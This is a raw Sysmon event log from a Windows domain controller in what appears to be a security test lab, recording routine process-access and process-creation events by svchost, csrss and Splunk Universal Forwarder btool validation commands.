13:55:55.323{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007374Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.323{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007373Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.323{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007372Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.323{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007371Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.323{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007370Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.323{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007369Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.323{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007368Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.323{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85EB-5FCF-3301-000000009101}1008C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007367Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.323{10ACEC4A-85EA-5FCF-2C01-000000009101}41404276C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{10ACEC4A-85EB-5FCF-3301-000000009101}1008C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+181c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007366Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.326{10ACEC4A-85EB-5FCF-3301-000000009101}1008C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{10ACEC4A-85EA-5FCF-2C01-000000009101}4140C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000007365Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.276{10ACEC4A-85EB-5FCF-3201-000000009101}42564608C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007364Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.042{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85EB-5FCF-3201-000000009101}4256C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007363Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.042{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007362Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.042{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007361Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.042{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007360Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.042{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007359Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.042{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007358Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.042{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007357Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.042{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007356Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.042{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007355Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.042{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-85EB-5FCF-3201-000000009101}4256C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007354Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.042{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007353Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.042{10ACEC4A-85EB-5FCF-3101-000000009101}49004100C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{10ACEC4A-85EB-5FCF-3201-000000009101}4256C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007352Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.045{10ACEC4A-85EB-5FCF-3201-000000009101}4256C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-85EB-5FCF-3101-000000009101}4900C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warnings 10341000x80000000000000007351Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.042{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85EB-5FCF-3101-000000009101}4900C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007350Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.042{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007349Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.042{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007348Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 